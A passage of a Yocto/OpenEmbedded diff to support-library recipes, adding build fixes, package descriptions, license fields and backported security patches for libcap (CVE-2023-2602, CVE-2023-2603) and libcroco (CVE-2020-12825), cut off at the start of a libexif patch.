+From adb1d4e5498a19e9d591ac8f42f9ddfdb23a1354 Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Thu, 15 Jul 2021 12:33:13 -0700
+Subject: [PATCH] use closefrom() on linux and glibc 2.34+
+
+Upstream-Status: Pending
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ src/posix-io.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/posix-io.c b/src/posix-io.c
+index e712ef2..ab8ded9 100644
+--- a/src/posix-io.c
++++ b/src/posix-io.c
+@@ -570,7 +570,7 @@ _gpgme_io_spawn (const char *path, char *const argv[], unsigned int flags,
+               if (fd_list[i].fd > fd)
+                 fd = fd_list[i].fd;
+             fd++;
+-#if defined(__sun) || defined(__FreeBSD__)
++#if defined(__sun) || defined(__FreeBSD__) || (defined(__GLIBC__) && __GNUC_PREREQ(2, 34))
+             closefrom (fd);
+             max_fds = fd;
+ #else /*!__sun */
diff --git a/meta/recipes-support/gpgme/gpgme_1.13.1.bb b/meta/recipes-support/gpgme/gpgme_1.13.1.bb
index b51534351d..dacc9896e4 100644
--- a/meta/recipes-support/gpgme/gpgme_1.13.1.bb
+++ b/meta/recipes-support/gpgme/gpgme_1.13.1.bb
@@ -20,7 +20,8 @@ SRC_URI = "${GNUPG_MIRROR}/gpgme/${BP}.tar.bz2 \
            file://0006-fix-build-path-issue.patch \
            file://0007-python-Add-variables-to-tests.patch \
            file://0008-do-not-auto-check-var-PYTHON.patch \
-          "
+           file://0001-use-closefrom-on-linux-and-glibc-2.34.patch \
+           "
 
 SRC_URI[md5sum] = "198f0a908ec3cd8f0ce9a4f3a4489645"
 SRC_URI[sha256sum] = "c4e30b227682374c23cddc7fdb9324a99694d907e79242a25a4deeedb393be46"
@@ -49,7 +50,7 @@ DEFAULT_LANGUAGES_class-target = "cpp"
 LANGUAGES ?= "${DEFAULT_LANGUAGES} python"
 
 PYTHON_INHERIT = "${@bb.utils.contains('PACKAGECONFIG', 'python2', 'pythonnative', '', d)}"
-PYTHON_INHERIT .= "${@bb.utils.contains('PACKAGECONFIG', 'python3', 'python3native', '', d)}"
+PYTHON_INHERIT .= "${@bb.utils.contains('PACKAGECONFIG', 'python3', 'python3native python3targetconfig', '', d)}"
 
 EXTRA_OECONF += '--enable-languages="${LANGUAGES}" \
                  --disable-gpgconf-test \
diff --git a/meta/recipes-support/icu/icu/0002-ICU-21175-Add-cnvalias-as-a-dependency-of-misc_res.patch b/meta/recipes-support/icu/icu/0002-ICU-21175-Add-cnvalias-as-a-dependency-of-misc_res.patch
new file mode 100644
index 0000000000..d7ddf33bce
--- /dev/null
+++ b/meta/recipes-support/icu/icu/0002-ICU-21175-Add-cnvalias-as-a-dependency-of-misc_res.patch
@@ -0,0 +1,24 @@
+From f2bc064e0d70ac068de4539d069bfab6cdccc48d Mon Sep 17 00:00:00 2001
+From: "Shane F. Carr" <shane@unicode.org>
+Date: Fri, 10 Jul 2020 14:28:22 -0500
+Subject: [PATCH] ICU-21175 Add cnvalias as a dependency of misc_res
+
+Upstream-Status: Backport [https://github.com/unicode-org/icu/commit/ee2d8b01034c3101de2bd58f9328daa076995e9e]
+Signed-off-by: Martin Jansa <Martin.Jansa@gmail.com>
+---
+ data/BUILDRULES.py | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/data/BUILDRULES.py b/data/BUILDRULES.py
+index 2338afd1f7..63b6e09273 100644
+--- a/data/BUILDRULES.py
++++ b/data/BUILDRULES.py
+@@ -361,7 +361,7 @@ def generate_misc(config, io, common_vars):

+         RepeatedExecutionRequest(

+             name = "misc_res",

+             category = "misc",

+-            dep_targets = [],

++            dep_targets = [DepTarget("cnvalias")], # ICU-21175

+             input_files = input_files,

+             output_files = output_files,

+             tool = IcuTool("genrb"),

diff --git a/meta/recipes-support/icu/icu_66.1.bb b/meta/recipes-support/icu/icu_66.1.bb
index 08254648e4..6ba88595df 100644
--- a/meta/recipes-support/icu/icu_66.1.bb
+++ b/meta/recipes-support/icu/icu_66.1.bb
@@ -21,10 +21,11 @@ BASE_SRC_URI = "https://github.com/unicode-org/icu/releases/download/release-${I
 DATA_SRC_URI = "https://github.com/unicode-org/icu/releases/download/release-${ICU_FOLDER}/icu4c-${ICU_PV}-data.zip"
 SRC_URI = "${BASE_SRC_URI};name=code \
            ${DATA_SRC_URI};name=data \
+           file://0001-Fix-big-endian-build.patch;patchdir=${WORKDIR} \
+           file://0002-ICU-21175-Add-cnvalias-as-a-dependency-of-misc_res.patch;patchdir=${WORKDIR} \
            file://filter.json \
            file://icu-pkgdata-large-cmd.patch \
            file://fix-install-manx.patch \
-           file://0001-Fix-big-endian-build.patch;apply=no \
            file://0001-icu-Added-armeb-support.patch \
            file://CVE-2020-10531.patch \
            "
@@ -47,7 +48,6 @@ do_make_icudata_class-target () {
     cd ${S}
     rm -rf data
     cp -a ${WORKDIR}/data .
-    patch -p1 < ${WORKDIR}/0001-Fix-big-endian-build.patch
     ${@bb.utils.contains('PACKAGECONFIG', 'make-icudata', '', 'exit 0', d)}
     AR='${BUILD_AR}' \
     CC='${BUILD_CC}' \
diff --git a/meta/recipes-support/iso-codes/iso-codes_4.4.bb b/meta/recipes-support/iso-codes/iso-codes_4.4.bb
index 4767dea84c..e8210eca9b 100644
--- a/meta/recipes-support/iso-codes/iso-codes_4.4.bb
+++ b/meta/recipes-support/iso-codes/iso-codes_4.4.bb
@@ -1,11 +1,14 @@
 SUMMARY = "ISO language, territory, currency, script codes and their translations"
+DESCRIPTION = "Provides lists of various ISO standards (e.g. country, \
+language, language scripts, and currency names) in one place, rather \
+than repeated in many programs throughout the system."
 HOMEPAGE = "https://salsa.debian.org/iso-codes-team/iso-codes"
 BUGTRACKER = "https://salsa.debian.org/iso-codes-team/iso-codes/issues"
 
 LICENSE = "LGPLv2.1"
 LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
 
-SRC_URI = "git://salsa.debian.org/iso-codes-team/iso-codes.git;protocol=http;branch=main;"
+SRC_URI = "git://salsa.debian.org/iso-codes-team/iso-codes.git;protocol=https;branch=main;"
 SRCREV = "38edb926592954b87eb527124da0ec68d2a748f3"
 
 # inherit gettext cannot be used, because it adds gettext-native to BASEDEPENDS which
diff --git a/meta/recipes-support/itstool/itstool_2.0.6.bb b/meta/recipes-support/itstool/itstool_2.0.6.bb
index 5f358f463d..54105af5f0 100644
--- a/meta/recipes-support/itstool/itstool_2.0.6.bb
+++ b/meta/recipes-support/itstool/itstool_2.0.6.bb
@@ -1,4 +1,8 @@
 SUMMARY = "ITS Tool allows you to translate your XML documents with PO files"
+DESCRIPTION = "It extracts messages from XML files and outputs PO template \
+files, then merges translations from MO files to create translated \
+XML files. It determines what to translate and how to chunk it into \
+messages using the W3C Internationalization Tag Set (ITS). "
 HOMEPAGE = "http://itstool.org/"
 LICENSE = "GPLv3"
 LIC_FILES_CHKSUM = "file://COPYING;md5=59c57b95fd7d0e9e238ebbc7ad47c5a5"
diff --git a/meta/recipes-support/libassuan/libassuan_2.5.3.bb b/meta/recipes-support/libassuan/libassuan_2.5.3.bb
index 52b4c0f1b9..9ef5074120 100644
--- a/meta/recipes-support/libassuan/libassuan_2.5.3.bb
+++ b/meta/recipes-support/libassuan/libassuan_2.5.3.bb
@@ -1,4 +1,7 @@
 SUMMARY = "IPC library used by GnuPG and GPGME"
+DESCRIPTION = "A small library implementing the so-called Assuan protocol. \
+This protocol is used for IPC between most newer GnuPG components. \
+Both, server and client side functions are provided. "
 HOMEPAGE = "http://www.gnupg.org/related_software/libassuan/"
 BUGTRACKER = "https://bugs.g10code.com/gnupg/index"
 
diff --git a/meta/recipes-support/libatomic-ops/libatomic-ops_7.6.10.bb b/meta/recipes-support/libatomic-ops/libatomic-ops_7.6.10.bb
index 7628eedb1b..3089d1f7ff 100644
--- a/meta/recipes-support/libatomic-ops/libatomic-ops_7.6.10.bb
+++ b/meta/recipes-support/libatomic-ops/libatomic-ops_7.6.10.bb
@@ -1,4 +1,5 @@
 SUMMARY = "A library for atomic integer operations"
+DESCRIPTION = "Package provides semi-portable access to hardware-provided atomic memory update operations on a number of architectures."
 HOMEPAGE = "https://github.com/ivmai/libatomic_ops/"
 SECTION = "optional"
 PROVIDES += "libatomics-ops"
diff --git a/meta/recipes-support/libbsd/libbsd_0.10.0.bb b/meta/recipes-support/libbsd/libbsd_0.10.0.bb
index 5b32b9af41..58925738cb 100644
--- a/meta/recipes-support/libbsd/libbsd_0.10.0.bb
+++ b/meta/recipes-support/libbsd/libbsd_0.10.0.bb
@@ -29,6 +29,12 @@ HOMEPAGE = "https://libbsd.freedesktop.org/wiki/"
 # License: public-domain-Colin-Plumb
 LICENSE = "BSD-3-Clause & BSD-4-Clause & ISC & PD"
 LICENSE_${PN} = "BSD-3-Clause & ISC & PD"
+LICENSE:${PN}-dbg = "BSD-3-Clause & ISC & PD"
+LICENSE:${PN}-dev = "BSD-3-Clause & ISC & PD"
+LICENSE:${PN}-doc = "BSD-3-Clause & BSD-4-Clause & ISC & PD"
+LICENSE:${PN}-locale = "BSD-3-Clause & ISC & PD"
+LICENSE:${PN}-src = "BSD-3-Clause & ISC & PD"
+LICENSE:${PN}-staticdev = "BSD-3-Clause & ISC & PD"
 LIC_FILES_CHKSUM = "file://COPYING;md5=2120be0173469a06ed185b688e0e1ae0"
 SECTION = "libs"
 
diff --git a/meta/recipes-support/libcap/files/CVE-2023-2602.patch b/meta/recipes-support/libcap/files/CVE-2023-2602.patch
new file mode 100644
index 0000000000..ca04d7297a
--- /dev/null
+++ b/meta/recipes-support/libcap/files/CVE-2023-2602.patch
@@ -0,0 +1,52 @@
+Backport of:
+
+From bc6b36682f188020ee4770fae1d41bde5b2c97bb Mon Sep 17 00:00:00 2001
+From: "Andrew G. Morgan" <morgan@kernel.org>
+Date: Wed, 3 May 2023 19:18:36 -0700
+Subject: Correct the check of pthread_create()'s return value.
+
+This function returns a positive number (errno) on error, so the code
+wasn't previously freeing some memory in this situation.
+
+Discussion:
+
+  https://stackoverflow.com/a/3581020/14760867
+
+Credit for finding this bug in libpsx goes to David Gstir of
+X41 D-Sec GmbH (https://x41-dsec.de/) who performed a security
+audit of the libcap source code in April of 2023. The audit
+was sponsored by the Open Source Technology Improvement Fund
+(https://ostif.org/).
+
+Audit ref: LCAP-CR-23-01 (CVE-2023-2602)
+
+Signed-off-by: Andrew G. Morgan <morgan@kernel.org>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libcap2/tree/debian/patches/CVE-2023-2602.patch?h=ubuntu/focal-security
+Upstream commit https://git.kernel.org/pub/scm/libs/libcap/libcap.git/commit/?id=bc6b36682f188020ee4770fae1d41bde5b2c97bb]
+CVE: CVE-2023-2602
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ psx/psx.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+--- a/libcap/psx.c
++++ b/libcap/psx.c
+@@ -272,7 +272,7 @@ int psx_pthread_create(pthread_t *thread
+ 
+     psx_wait_for_idle();
+     int ret = pthread_create(thread, attr, start_routine, arg);
+-    if (ret != -1) {
++    if (ret == 0) {
+ 	psx_do_registration(*thread);
+     }
+     psx_resume_idle();
+@@ -287,7 +287,7 @@ int __wrap_pthread_create(pthread_t *thr
+ 			  void *(*start_routine) (void *), void *arg) {
+     psx_wait_for_idle();
+     int ret = __real_pthread_create(thread, attr, start_routine, arg);
+-    if (ret != -1) {
++    if (ret == 0) {
+ 	psx_do_registration(*thread);
+     }
+     psx_resume_idle();
diff --git a/meta/recipes-support/libcap/files/CVE-2023-2603.patch b/meta/recipes-support/libcap/files/CVE-2023-2603.patch
new file mode 100644
index 0000000000..cf86ac2a46
--- /dev/null
+++ b/meta/recipes-support/libcap/files/CVE-2023-2603.patch
@@ -0,0 +1,58 @@
+Backport of:
+
+From 422bec25ae4a1ab03fd4d6f728695ed279173b18 Mon Sep 17 00:00:00 2001
+From: "Andrew G. Morgan" <morgan@kernel.org>
+Date: Wed, 3 May 2023 19:44:22 -0700
+Subject: Large strings can confuse libcap's internal strdup code.
+
+Avoid something subtle with really long strings: 1073741823 should
+be enough for anybody. This is an improved fix over something attempted
+in libcap-2.55 to address some static analysis findings.
+
+Reviewing the library, cap_proc_root() and cap_launcher_set_chroot()
+are the only two calls where the library is potentially exposed to a
+user controlled string input.
+
+Credit for finding this bug in libcap goes to Richard Weinberger of
+X41 D-Sec GmbH (https://x41-dsec.de/) who performed a security audit
+of the libcap source code in April of 2023. The audit was sponsored
+by the Open Source Technology Improvement Fund (https://ostif.org/).
+
+Audit ref: LCAP-CR-23-02 (CVE-2023-2603)
+
+Signed-off-by: Andrew G. Morgan <morgan@kernel.org>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libcap2/tree/debian/patches/CVE-2023-2603.patch?h=ubuntu/focal-security
+Upstream commit https://git.kernel.org/pub/scm/libs/libcap/libcap.git/commit/?id=422bec25ae4a1ab03fd4d6f728695ed279173b18]
+CVE: CVE-2023-2603
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libcap/cap_alloc.c | 12 +++++++-----
+ 1 file changed, 7 insertions(+), 5 deletions(-)
+
+--- a/libcap/cap_alloc.c
++++ b/libcap/cap_alloc.c
+@@ -76,13 +76,22 @@ cap_t cap_init(void)
+ char *_libcap_strdup(const char *old)
+ {
+     __u32 *raw_data;
++    size_t len;
+ 
+     if (old == NULL) {
+ 	errno = EINVAL;
+ 	return NULL;
+     }
+ 
+-    raw_data = malloc( sizeof(__u32) + strlen(old) + 1 );
++    len = strlen(old);
++    if ((len & 0x3fffffff) != len) {
++	_cap_debug("len is too long for libcap to manage");
++	errno = EINVAL;
++	return NULL;
++    }
++    len += sizeof(__u32) + 1;
++
++    raw_data = malloc(len);
+     if (raw_data == NULL) {
+ 	errno = ENOMEM;
+ 	return NULL;
diff --git a/meta/recipes-support/libcap/libcap_2.32.bb b/meta/recipes-support/libcap/libcap_2.32.bb
index d78a58f7d2..64d5190aa7 100644
--- a/meta/recipes-support/libcap/libcap_2.32.bb
+++ b/meta/recipes-support/libcap/libcap_2.32.bb
@@ -1,8 +1,10 @@
 SUMMARY = "Library for getting/setting POSIX.1e capabilities"
+DESCRIPTION = "A library providing the API to access POSIX capabilities. \
+These allow giving various kinds of specific privileges to individual \
+users, without giving them full root permissions."
 HOMEPAGE = "http://sites.google.com/site/fullycapable/"
-
 # no specific GPL version required
-LICENSE = "BSD | GPLv2"
+LICENSE = "BSD-3-Clause | GPLv2"
 LIC_FILES_CHKSUM = "file://License;md5=3f84fd6f29d453a56514cb7e4ead25f1"
 
 DEPENDS = "hostperl-runtime-native gperf-native"
@@ -11,6 +13,8 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/libs/security/linux-privs/${BPN}2/${BPN}-${
            file://0001-ensure-the-XATTR_NAME_CAPS-is-defined-when-it-is-use.patch \
            file://0002-tests-do-not-run-target-executables.patch \
            file://0001-tests-do-not-statically-link-a-test.patch \
+           file://CVE-2023-2602.patch \
+           file://CVE-2023-2603.patch \
            "
 SRC_URI[md5sum] = "7416119c9fdcfd0e8dd190a432c668e9"
 SRC_URI[sha256sum] = "1005e3d227f2340ad1e3360ef8b69d15e3c72a29c09f4894d7aac038bd26e2be"
diff --git a/meta/recipes-support/libcheck/libcheck_0.14.0.bb b/meta/recipes-support/libcheck/libcheck_0.14.0.bb
index a88f009cdb..57963d83d4 100644
--- a/meta/recipes-support/libcheck/libcheck_0.14.0.bb
+++ b/meta/recipes-support/libcheck/libcheck_0.14.0.bb
@@ -1,4 +1,9 @@
 SUMMARY  = "Check - unit testing framework for C code"
+DESCRIPTION = "It features a simple interface for defining unit tests, \
+putting little in the way of the developer. Tests are run in a separate \
+address space, so both assertion failures and code errors that cause \
+segmentation faults or other signals can be caught. Test results are \
+reportable in the following: Subunit, TAP, XML, and a generic logging format."
 HOMEPAGE = "https://libcheck.github.io/check/"
 SECTION = "devel"
 
diff --git a/meta/recipes-support/libcroco/files/CVE-2020-12825.patch b/meta/recipes-support/libcroco/files/CVE-2020-12825.patch
new file mode 100644
index 0000000000..42f92e3607
--- /dev/null
+++ b/meta/recipes-support/libcroco/files/CVE-2020-12825.patch
@@ -0,0 +1,192 @@
+From fdf78a4877afa987ba646a8779b513f258e6d04c Mon Sep 17 00:00:00 2001
+From: Michael Catanzaro <mcatanzaro@gnome.org>
+Date: Fri, 31 Jul 2020 15:21:53 -0500
+Subject: [PATCH] libcroco: Limit recursion in block and any productions
+
+ (CVE-2020-12825)
+
+If we don't have any limits, we can recurse forever and overflow the
+stack.
+
+Fixes #8
+This is per https://gitlab.gnome.org/Archive/libcroco/-/issues/8
+
+https://gitlab.gnome.org/GNOME/gnome-shell/-/merge_requests/1404
+
+CVE: CVE-2020-12825
+Upstream-Status: Backport [https://gitlab.gnome.org/Archive/libcroco/-/commit/6eb257e5c731c691eb137fca94e916ca73941a5a]
+Comment: No refreshing changes done.
+Signed-off-by: Saloni Jain <Saloni.Jain@kpit.com>
+
+---
+ src/cr-parser.c | 44 +++++++++++++++++++++++++++++---------------
+ 1 file changed, 29 insertions(+), 15 deletions(-)
+
+diff --git a/src/cr-parser.c b/src/cr-parser.c
+index 18c9a01..f4a62e3 100644
+--- a/src/cr-parser.c
++++ b/src/cr-parser.c
+@@ -136,6 +136,8 @@ struct _CRParserPriv {
+ 
+ #define CHARS_TAB_SIZE 12
+ 
++#define RECURSIVE_CALLERS_LIMIT 100
++
+ /**
+  * IS_NUM:
+  *@a_char: the char to test.
+@@ -344,9 +346,11 @@ static enum CRStatus cr_parser_parse_selector_core (CRParser * a_this);
+ 
+ static enum CRStatus cr_parser_parse_declaration_core (CRParser * a_this);
+ 
+-static enum CRStatus cr_parser_parse_any_core (CRParser * a_this);
++static enum CRStatus cr_parser_parse_any_core (CRParser * a_this,
++                                               guint      n_calls);
+ 
+-static enum CRStatus cr_parser_parse_block_core (CRParser * a_this);
++static enum CRStatus cr_parser_parse_block_core (CRParser * a_this,
++                                                 guint      n_calls);
+ 
+ static enum CRStatus cr_parser_parse_value_core (CRParser * a_this);
+ 
+@@ -784,7 +788,7 @@ cr_parser_parse_atrule_core (CRParser * a_this)
+         cr_parser_try_to_skip_spaces_and_comments (a_this);
+ 
+         do {
+-                status = cr_parser_parse_any_core (a_this);
++                status = cr_parser_parse_any_core (a_this, 0);
+         } while (status == CR_OK);
+ 
+         status = cr_tknzr_get_next_token (PRIVATE (a_this)->tknzr,
+@@ -795,7 +799,7 @@ cr_parser_parse_atrule_core (CRParser * a_this)
+                 cr_tknzr_unget_token (PRIVATE (a_this)->tknzr, 
+                                       token);
+                 token = NULL;
+-                status = cr_parser_parse_block_core (a_this);
++                status = cr_parser_parse_block_core (a_this, 0);
+                 CHECK_PARSING_STATUS (status,
+                                       FALSE);
+                 goto done;
+@@ -930,11 +934,11 @@ cr_parser_parse_selector_core (CRParser * a_this)
+ 
+         RECORD_INITIAL_POS (a_this, &init_pos);
+ 
+-        status = cr_parser_parse_any_core (a_this);
++        status = cr_parser_parse_any_core (a_this, 0);
+         CHECK_PARSING_STATUS (status, FALSE);
+ 
+         do {
+-                status = cr_parser_parse_any_core (a_this);
++                status = cr_parser_parse_any_core (a_this, 0);
+ 
+         } while (status == CR_OK);
+ 
+@@ -956,10 +960,12 @@ cr_parser_parse_selector_core (CRParser * a_this)
+  *in chapter 4.1 of the css2 spec.
+  *block ::= '{' S* [ any | block | ATKEYWORD S* | ';' ]* '}' S*;
+  *@param a_this the current instance of #CRParser.
++ *@param n_calls used to limit recursion depth
+  *FIXME: code this function.
+  */
+ static enum CRStatus
+-cr_parser_parse_block_core (CRParser * a_this)
++cr_parser_parse_block_core (CRParser * a_this,
++                            guint      n_calls)
+ {
+         CRToken *token = NULL;
+         CRInputPos init_pos;
+@@ -967,6 +973,9 @@ cr_parser_parse_block_core (CRParser * a_this)
+ 
+         g_return_val_if_fail (a_this && PRIVATE (a_this), CR_BAD_PARAM_ERROR);
+ 
++        if (n_calls > RECURSIVE_CALLERS_LIMIT)
++                return CR_ERROR;
++
+         RECORD_INITIAL_POS (a_this, &init_pos);
+ 
+         status = cr_tknzr_get_next_token (PRIVATE (a_this)->tknzr, &token);
+@@ -996,13 +1005,13 @@ cr_parser_parse_block_core (CRParser * a_this)
+         } else if (token->type == CBO_TK) {
+                 cr_tknzr_unget_token (PRIVATE (a_this)->tknzr, token);
+                 token = NULL;
+-                status = cr_parser_parse_block_core (a_this);
++                status = cr_parser_parse_block_core (a_this, n_calls + 1);
+                 CHECK_PARSING_STATUS (status, FALSE);
+                 goto parse_block_content;
+         } else {
+                 cr_tknzr_unget_token (PRIVATE (a_this)->tknzr, token);
+                 token = NULL;
+-                status = cr_parser_parse_any_core (a_this);
++                status = cr_parser_parse_any_core (a_this, n_calls + 1);
+                 CHECK_PARSING_STATUS (status, FALSE);
+                 goto parse_block_content;
+         }
+@@ -1109,7 +1118,7 @@ cr_parser_parse_value_core (CRParser * a_this)
+                 status = cr_tknzr_unget_token (PRIVATE (a_this)->tknzr,
+                                                token);
+                 token = NULL;
+-                status = cr_parser_parse_block_core (a_this);
++                status = cr_parser_parse_block_core (a_this, 0);
+                 CHECK_PARSING_STATUS (status, FALSE);
+                 ref++;
+                 goto continue_parsing;
+@@ -1123,7 +1132,7 @@ cr_parser_parse_value_core (CRParser * a_this)
+                 status = cr_tknzr_unget_token (PRIVATE (a_this)->tknzr,
+                                                token);
+                 token = NULL;
+-                status = cr_parser_parse_any_core (a_this);
++                status = cr_parser_parse_any_core (a_this, 0);
+                 if (status == CR_OK) {
+                         ref++;
+                         goto continue_parsing;
+@@ -1162,10 +1171,12 @@ cr_parser_parse_value_core (CRParser * a_this)
+  *        | FUNCTION | DASHMATCH | '(' any* ')' | '[' any* ']' ] S*;
+  *
+  *@param a_this the current instance of #CRParser.
++ *@param n_calls used to limit recursion depth
+  *@return CR_OK upon successfull completion, an error code otherwise.
+  */
+ static enum CRStatus
+-cr_parser_parse_any_core (CRParser * a_this)
++cr_parser_parse_any_core (CRParser * a_this,
++                          guint      n_calls)
+ {
+         CRToken *token1 = NULL,
+                 *token2 = NULL;
+@@ -1174,6 +1185,9 @@ cr_parser_parse_any_core (CRParser * a_this)
+ 
+         g_return_val_if_fail (a_this, CR_BAD_PARAM_ERROR);
+ 
++        if (n_calls > RECURSIVE_CALLERS_LIMIT)
++                return CR_ERROR;
++
+         RECORD_INITIAL_POS (a_this, &init_pos);
+ 
+         status = cr_tknzr_get_next_token (PRIVATE (a_this)->tknzr, &token1);
+@@ -1212,7 +1226,7 @@ cr_parser_parse_any_core (CRParser * a_this)
+                  *We consider parameter as being an "any*" production.
+                  */
+                 do {
+-                        status = cr_parser_parse_any_core (a_this);
++                        status = cr_parser_parse_any_core (a_this, n_calls + 1);
+                 } while (status == CR_OK);
+ 
+                 ENSURE_PARSING_COND (status == CR_PARSING_ERROR);
+@@ -1237,7 +1251,7 @@ cr_parser_parse_any_core (CRParser * a_this)
+                 }
+ 
+                 do {
+-                        status = cr_parser_parse_any_core (a_this);
++                        status = cr_parser_parse_any_core (a_this, n_calls + 1);
+                 } while (status == CR_OK);
+ 
+                 ENSURE_PARSING_COND (status == CR_PARSING_ERROR);
+@@ -1265,7 +1279,7 @@ cr_parser_parse_any_core (CRParser * a_this)
+                 }
+ 
+                 do {
+-                        status = cr_parser_parse_any_core (a_this);
++                        status = cr_parser_parse_any_core (a_this, n_calls + 1);
+                 } while (status == CR_OK);
+ 
+                 ENSURE_PARSING_COND (status == CR_PARSING_ERROR);
diff --git a/meta/recipes-support/libcroco/libcroco_0.6.13.bb b/meta/recipes-support/libcroco/libcroco_0.6.13.bb
index 9171a9de5c..66ee647ffa 100644
--- a/meta/recipes-support/libcroco/libcroco_0.6.13.bb
+++ b/meta/recipes-support/libcroco/libcroco_0.6.13.bb
@@ -1,4 +1,7 @@
 SUMMARY = "Cascading Style Sheet (CSS) parsing and manipulation toolkit"
+DESCRIPTION = "The Libcroco project is an effort to build a generic \
+Cascading Style Sheet (CSS) parsing and manipulation toolkit that can be \
+used by GNOME applications in need of CSS support."
 HOMEPAGE = "http://www.gnome.org/"
 BUGTRACKER = "https://bugzilla.gnome.org/"
 
@@ -18,3 +21,6 @@ inherit gnomebase gtk-doc binconfig-disabled
 
 SRC_URI[archive.md5sum] = "c80c5a8385011a0260dce6bd0da93dce"
 SRC_URI[archive.sha256sum] = "767ec234ae7aa684695b3a735548224888132e063f92db585759b422570621d4"
+
+SRC_URI +="file://CVE-2020-12825.patch \
+"
diff --git a/meta/recipes-support/libdaemon/libdaemon_0.14.bb b/meta/recipes-support/libdaemon/libdaemon_0.14.bb
index 070ee1890e..85a30bcac3 100644
--- a/meta/recipes-support/libdaemon/libdaemon_0.14.bb
+++ b/meta/recipes-support/libdaemon/libdaemon_0.14.bb
@@ -1,4 +1,8 @@
 SUMMARY = "Lightweight C library which eases the writing of UNIX daemons"
+DESCRIPTION = "Lightweight daemon framework for OpenBSD. It provides \
+facilities for logging and a signal handler to enable graceful shutdown, \
+as well as file locking to ensure that only a single copy of a given daemon \
+is running at a time."
 SECTION = "libs"
 AUTHOR = "Lennart Poettering <lennart@poettering.net>"
 HOMEPAGE = "http://0pointer.de/lennart/projects/libdaemon/"
diff --git a/meta/recipes-support/libevdev/libevdev/determinism.patch b/meta/recipes-support/libevdev/libevdev/determinism.patch
index 33a6076b78..06128a8e7e 100644
--- a/meta/recipes-support/libevdev/libevdev/determinism.patch
+++ b/meta/recipes-support/libevdev/libevdev/determinism.patch
@@ -4,7 +4,8 @@ Sort to remove this inconsistency.
 RP 2020/2/7
 
 Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
-Upstream-Status: Pending
+Submitted: https://lists.freedesktop.org/archives/input-tools/2021-February/001560.html
+Upstream-Status: Backport [https://gitlab.freedesktop.org/libevdev/libevdev/-/commit/8d70f449892c6f7659e07bb0f06b8347677bb7d8]
 
 Index: a/libevdev/make-event-names.py
 ===================================================================
diff --git a/meta/recipes-support/libevdev/libevdev_1.8.0.bb b/meta/recipes-support/libevdev/libevdev_1.8.0.bb
index 3523dc0968..fd7dd15c26 100644
--- a/meta/recipes-support/libevdev/libevdev_1.8.0.bb
+++ b/meta/recipes-support/libevdev/libevdev_1.8.0.bb
@@ -1,4 +1,7 @@
 SUMMARY = "Wrapper library for evdev devices"
+DESCRIPTION = "A library for handling evdev kernel devices. It abstracts \
+the evdev ioctls through type-safe interfaces and provides functions \
+to change the appearance of the device."
 HOMEPAGE = "http://www.freedesktop.org/wiki/Software/libevdev/"
 SECTION = "libs"
 
diff --git a/meta/recipes-support/libevent/libevent/0002-test-regress.h-Increase-default-timeval-tolerance-50.patch b/meta/recipes-support/libevent/libevent/0002-test-regress.h-Increase-default-timeval-tolerance-50.patch
new file mode 100644
index 0000000000..0b20eda3c0
--- /dev/null
+++ b/meta/recipes-support/libevent/libevent/0002-test-regress.h-Increase-default-timeval-tolerance-50.patch
@@ -0,0 +1,33 @@
+From dff8fd27edb23bc1486809186c6a4fe1f75f2179 Mon Sep 17 00:00:00 2001
+From: Yi Fan Yu <yifan.yu@windriver.com>
+Date: Thu, 22 Apr 2021 22:35:59 -0400
+Subject: [PATCH] test/regress.h: Increase default timeval tolerance 50 ms ->
+ 100 ms
+
+The default timeout tolerance is 50 ms,
+which causes intermittent failure in many the
+related tests in arm64 QEMU.
+
+See: https://bugzilla.yoctoproject.org/show_bug.cgi?id=14163
+(The root cause seems to be a heavy load)
+
+Upstream-Status: Submitted [https://github.com/libevent/libevent/pull/1157]
+
+Signed-off-by: Yi Fan Yu <yifan.yu@windriver.com>
+---
+ test/regress.h | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/test/regress.h b/test/regress.h
+index f06a7669..829af4a7 100644
+--- a/test/regress.h
++++ b/test/regress.h
+@@ -127,7 +127,7 @@ int test_ai_eq_(const struct evutil_addrinfo *ai, const char *sockaddr_port,
+ 	tt_int_op(labs(timeval_msec_diff((tv1), (tv2)) - diff), <=, tolerance)
+ 
+ #define test_timeval_diff_eq(tv1, tv2, diff)				\
+-	test_timeval_diff_leq((tv1), (tv2), (diff), 50)
++	test_timeval_diff_leq((tv1), (tv2), (diff), 100)
+ 
+ long timeval_msec_diff(const struct timeval *start, const struct timeval *end);
+
diff --git a/meta/recipes-support/libevent/libevent_2.1.11.bb b/meta/recipes-support/libevent/libevent_2.1.11.bb
index fb186eb89f..75f9979c5b 100644
--- a/meta/recipes-support/libevent/libevent_2.1.11.bb
+++ b/meta/recipes-support/libevent/libevent_2.1.11.bb
@@ -1,4 +1,9 @@
 SUMMARY = "An asynchronous event notification library"
+DESCRIPTION = "A software library that provides asynchronous event \
+notification. The libevent API provides a mechanism to execute a callback \
+function when a specific event occurs on a file descriptor or after a \
+timeout has been reached. libevent also supports callbacks triggered \
+by signals and regular timeouts"
 HOMEPAGE = "http://libevent.org/"
 BUGTRACKER = "https://github.com/libevent/libevent/issues"
 SECTION = "libs"
@@ -10,6 +15,7 @@ SRC_URI = "https://github.com/libevent/libevent/releases/download/release-${PV}-
            file://Makefile-missing-test-dir.patch \
            file://run-ptest \
            file://0001-test-regress_dns.c-patch-out-tests-that-require-a-wo.patch \
+           file://0002-test-regress.h-Increase-default-timeval-tolerance-50.patch \
            "
 
 SRC_URI[md5sum] = "7f35cfe69b82d879111ec0d7b7b1c531"
diff --git a/meta/recipes-support/libexif/files/CVE-2020-0198.patch b/meta/recipes-support/libexif/files/CVE-2020-0198.patch
new file mode 100644
